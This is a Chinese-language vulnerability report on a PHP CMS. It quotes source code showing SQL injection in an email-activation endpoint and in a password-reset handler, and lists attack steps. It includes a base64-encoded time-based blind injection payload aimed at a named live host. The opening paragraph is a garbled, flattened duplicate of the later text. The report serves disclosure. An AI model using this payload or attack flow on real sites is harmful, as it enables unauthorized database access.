### 简要描述: ### 详细说明: index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA== 测试 model/qqconnect.class.php function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id));//解码 if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){//主要看coding 是配置文件里面的 默认是空 如果修改 #echo "`email_status`='1'","`uid`='".$arr[0]."'"; $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'");//带入查询 $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } 如果网站修改了coding的情况下 model/sendcert.class.php function sendcert_action() { extract($_POST); if(md5($_POST["authcode"])!=$_SESSION[authcode]){ $this->obj->ACT_msg("index.php?M=forgetpw","验证码错误","2"); } $info = $this->obj->DB_select_once("member","`username`='$username'","`uid`,`email_status`,`email`");...
### 简要描述:

邮箱激活入口 `index.php?M=qqconnect&C=mcert` 把 `id` 参数 base64 解码后，直接将第一段 `$arr[0]` 拼接进 `member` 表 UPDATE 语句的 WHERE 条件，形成 SQL 注入。唯一的校验是第三段与配置项 `coding` 的宽松比较（`==`），而 `coding` 默认为空，且会随激活邮件中的链接一起发给用户，因此起不到鉴权作用。

### 详细说明:

测试 URL：`index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA==`

`model/qqconnect.class.php`：

```php
function mcert_action(){
    $id=$_GET['id'];
    $arr=@explode("|",base64_decode($id));//解码
    if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){//主要看coding 是配置文件里面的 默认是空 如果修改
        #echo "`email_status`='1'","`uid`='".$arr[0]."'";
        $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'");//带入查询
        $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证");
    }else{
        $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2");
    }
}
```

`$arr[0]` 来自用户可控的 `id`，未做任何转义或类型检查就拼入 `` `uid`='...' ``，这就是注入点。`coding` 为空（默认值）时，只要解码后的字符串以 `|` 结尾使 `$arr[2]` 为空串即可通过校验。

如果网站修改了 `coding`，看 `model/sendcert.class.php`：

```php
function sendcert_action() {
    extract($_POST);
    if(md5($_POST["authcode"])!=$_SESSION[authcode]){
        $this->obj->ACT_msg("index.php?M=forgetpw","验证码错误","2");
    }
    $info = $this->obj->DB_select_once("member","`username`='$username'","`uid`,`email_status`,`email`");
    if(is_array($info)) {
        if($info[email_status]=="1") {
            $this->obj->ACT_msg("index.php?M=login&usertype=1", $msg = "您的账户已经激活,请直接登录!", $st = 2, $tm = 3);
        }
        $randstr=rand(10000000,99999999);
        $base=base64_encode($info[uid]."|".$randstr."|".$this->config[coding]);//这里加入了coding发送给了用户
        //echo $base;
        $data["type"]="cert";
        $data["email"]=$info[email];
        echo $this->config[sy_weburl]."/index.php?M=qqconnect&C=mcert&id=".$base;
        $data["url"]="<a href='".$this->config[sy_weburl]."/index.php?M=qqconnect&C=mcert&id=".$base."'>点击激活</a>";
        $data["date"]=date("Y-m-d");
        $this->send_msg_email($data);
        $this->obj->ACT_msg("index.php?M=sendcert", $msg = "激活邮件已经发送到您的邮箱!", $st = 2, $tm = 3);
    }else{
        $this->obj->ACT_msg("index.php?M=login", $msg = "对不起!没有该用户!", $st = 2, $tm = 3);
    }
}
```

激活链接的 `id` 是 `uid|随机数|coding` 的 base64 编码（base64 只是编码，不是加密），用户收到邮件后解码即可拿到 `coding`，之后按同样格式构造 `id` 就能通过 `mcert_action` 的校验，`coding` 改成什么都没用。

补充两点（同一段代码中可见）：其一，`extract($_POST)` 之后 `$username` 未经处理直接拼入 `DB_select_once` 的条件 `` `username`='$username' ``，这里是第二个 SQL 注入点，不依赖 `coding`；其二，验证码比较 `md5($_POST["authcode"])!=$_SESSION[authcode]` 失败后只调用了 `ACT_msg`，若该方法内部不终止执行，后续逻辑会继续跑（需结合 `ACT_msg` 的实现确认）。

### 漏洞证明:

这样我们构造攻击流程：

1. 注册用户。
2. 找回密码：打开找回密码页面获取一个验证码，然后打开 `xx.com/index.php?M=sendcert&C=sendcert`，POST 提交 `authcode=验证码&username=注册用户名`。
3. 查看邮箱，对激活链接中的 `id` 做 base64 解码，取第三段即为 `coding`。
4. 按 `注入语句|任意数字|coding` 的格式构造 `id`，base64 编码后访问 `index.php?M=qqconnect&C=mcert&id=...` 进行注入。
`http://test.khjyw.net/index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA==`

其中 `id` 的 base64 部分解码为 `1' and sleep(10) and '1'='1|14908142|`。按 `|` 拆分后 `$arr[0]` 为 `1' and sleep(10) and '1'='1`，`$arr[2]` 为空串（与默认为空的 `coding` 宽松相等，校验通过），最终拼出的 WHERE 条件为 `` `uid`='1' and sleep(10) and '1'='1' ``。若响应延迟约 10 秒，即可确认存在基于时间的盲注。